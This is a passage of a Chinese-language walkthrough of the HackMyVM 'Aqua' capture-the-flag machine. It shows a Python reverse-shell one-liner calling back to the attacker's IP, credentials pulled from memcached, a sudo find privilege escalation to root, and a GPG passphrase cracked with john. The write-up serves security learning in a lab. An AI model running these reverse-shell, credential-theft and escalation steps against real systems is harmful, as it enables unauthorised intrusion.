root     16324  0.0  0.0      0     0 ?        I    08:59   0:00 [kworker/0:0]
90
tomcat   21309  0.0  0.0   4636   924 ?        S    09:04   0:00 /bin/sh -c cd "/";ps aux;echo 8b4a2db5a;pwd;echo 5ed6dbb6
91
tomcat   21310  0.0  0.3  38456  3616 ?        R    09:04   0:00 ps aux
92
root     21311  0.0  0.4  47220  4436 ?        R    09:04   0:00 /lib/systemd/systemd-udevd
93
root     21312  0.0  0.3  47220  4008 ?        R    09:04   0:00 /lib/systemd/systemd-udevd
94
root     21313  0.0  0.3  47220  3816 ?        R    09:04   0:00 /lib/systemd/systemd-udevd
95
root     21314  0.0  0.3  47220  3816 ?        R    09:04   0:00 /lib/systemd/systemd-udevd
96
root     21315  0.0  0.0      0     0 ?        Z    09:04   0:00 [systemd-udevd] <defunct>
97
root     21316  0.0  0.3  47220  3880 ?        R    09:04   0:00 /lib/systemd/systemd-udevd
98
www-data 26420  0.0  1.0 344720 10684 ?        S    06:59   0:00 /usr/sbin/apache2 -k start
99
www-data 26491  0.0  1.0 344656 10620 ?        S    06:59   0:00 /usr/sbin/apache2 -k start
100
www-data 26530  0.0  1.0 344664 10632 ?        S    06:59   0:00 /usr/sbin/apache2 -k start
101
root     28143  0.0  0.0      0     0 ?        I    08:39   0:01 [kworker/0:1]
102
www-data 31112  0.0  1.0 344656 10620 ?        S    07:04   0:00 /usr/sbin/apache2 -k start
103
www-data 31113  0.0  1.0 344656 10620 ?        S    07:04   0:00 /usr/sbin/apache2 -k start
104
www-data 31130  0.0  1.0 344720 10684 ?        S    07:04   0:00 /usr/sbin/apache2 -k start
105
www-data 31131  0.0  1.0 344656 10620 ?        S    07:04   0:00 /usr/sbin/apache2 -k start
106
www-data 31132  0.0  1.0 344656 10620 ?        S    07:04   0:00 /usr/sbin/apache2 -k start
107
root     32627  0.0  0.0      0     0 ?        I    07:38   0:00 [kworker/u2:2]

1
memcache   810  0.0  0.4 425800  4128 ?        Ssl  06:34   0:04 /usr/bin/memcached -m 64 -p 11211 -u memcache -l 127.0.0.1

telnet 127.0.0.1 11211

发现蚁剑终端不好用

懒得反弹上传shell了直接用终端反弹shell

1
python -c 'import socket,os,pty;s=socket.socket();s.connect(("172.16.55.210",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

1
┌──(root㉿kali)-[/home/kali/Desktop/hmv/aqua]
2
└─# nc -lvvp 4444
3
listening on [any] 4444 ...
4
172.16.52.195: inverse host lookup failed: Host name lookup failure
5
connect to [172.16.55.210] from (UNKNOWN) [172.16.52.195] 47118
6
/bin/sh: 0: can't access tty; job control turned off
7
$ whoami
8
tomcat
9

10
python3 -c 'import pty; pty.spawn("/bin/bash")'
11
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
12
python3 -c 'import pty; pty.spawn("/bin/bash")'
13
tomcat@Atlantis:/$
14

15

16
tomcat@Atlantis:/$ telnet 127.0.0.1 11211
17
telnet 127.0.0.1 11211
18
Trying 127.0.0.1...
19
Connected to 127.0.0.1.
20
Escape character is '^]'.
21
ERROR
22

23
get username
24
get username
25
VALUE username 0 8
26
tridente
27
END
28
get password
29
get password
30
VALUE password 0 18
31
N3ptun0D10sd3lM4r$

1
┌──(root㉿kali)-[/home/kali/Desktop/hmv/aqua]
2
└─# ssh tridente@172.16.52.195
3
The authenticity of host '172.16.52.195 (172.16.52.195)' can't be established.
4
ED25519 key fingerprint is SHA256:0AywQESzfZyECG/0KTquKNzvJNE23REqvogOSySwo54.
5
This key is not known by any other names.
6
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
7
Warning: Permanently added '172.16.52.195' (ED25519) to the list of known hosts.
8
tridente@172.16.52.195's password:
9
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-143-generic x86_64)
10

11
 * Documentation:  https://help.ubuntu.com
12
 * Management:     https://landscape.canonical.com
13
 * Support:        https://ubuntu.com/advantage
14

15
  System information as of Wed Dec 10 09:19:33 UTC 2025
16

17
  System load:  0.0                Processes:             127
18
  Usage of /:   29.9% of 14.70GB   Users logged in:       0
19
  Memory usage: 51%                IP address for enp0s3: 172.16.52.195
20
  Swap usage:   0%
21

22

23
181 packages can be updated.
24
113 updates are security updates.
25

26

27
Last login: Wed Mar 16 20:53:29 2022 from 192.168.0.55
28
tridente@Atlantis:~$

tridente提权

1
tridente@Atlantis:~$ sudo -l
2
[sudo] password for tridente:
3
Matching Defaults entries for tridente on Atlantis:
4
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
5

6
User tridente may run the following commands on Atlantis:
7
    (root) /home/tridente/find

find特权

1
tridente@Atlantis:~$ sudo /home/tridente/find . -exec /bin/bash \;
2
root@Atlantis:~#

1
root@Atlantis:~# cat user.txt
2
Bien echo ya tienes el tridente
3

4
flag --> f506a6ee37275430ac07caa95914aeba

1
nc 172.16.55.210 5555 < root.txt.gpg
2
nc -lvnp 5555 > root.txt.gpg

gpg 是什么
ChatGPT 说：
gpg 是 GNU Privacy Guard 的缩写，是 Linux/Unix 下非常常用的 加密和签名工具，用来保护文件或通信内容的安全。它基于 PGP（Pretty Good Privacy） 标准。

1
┌──(root㉿kali)-[/home/kali/Desktop/hmv/aqua]
2
└─# gpg2john root.txt.gpg > flag_hash
3

4
File root.txt.gpg
5

6
┌──(root㉿kali)-[/home/kali/Desktop/hmv/aqua]
7
└─# john flag_hash -w=/usr/share/wordlists/rockyou.txt
8
Using default input encoding: UTF-8
9
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
10
Cost 1 (s2k-count) is 41943040 for all loaded hashes
11
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
12
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
13
Will run 4 OpenMP threads
14
Press 'q' or Ctrl-C to abort, almost any other key for status
15
arthur           (?)
16
1g 0:00:00:13 DONE (2025-12-10 19:58) 0.07220g/s 103.3p/s 103.3c/s 103.3C/s bernard..12345a
17
Use the "--show" option to display all of the cracked passwords reliably
18
Session completed.

爆破得出来密码

1
gpg root.txt.gpg

1
Bien hecho Arthur eres el nuevo Rey de la Atlantida
2

3
flag --> e16957fbc9202932b1dc7fe3e10a197e

Thanks for reading!

HMV-Aqua

Wed Dec 10 2025

348 words · 2 minutes

Documentation Hackmyvm Hackmyvm Linux Machine Enumeration Privilege Escalation Password Attacks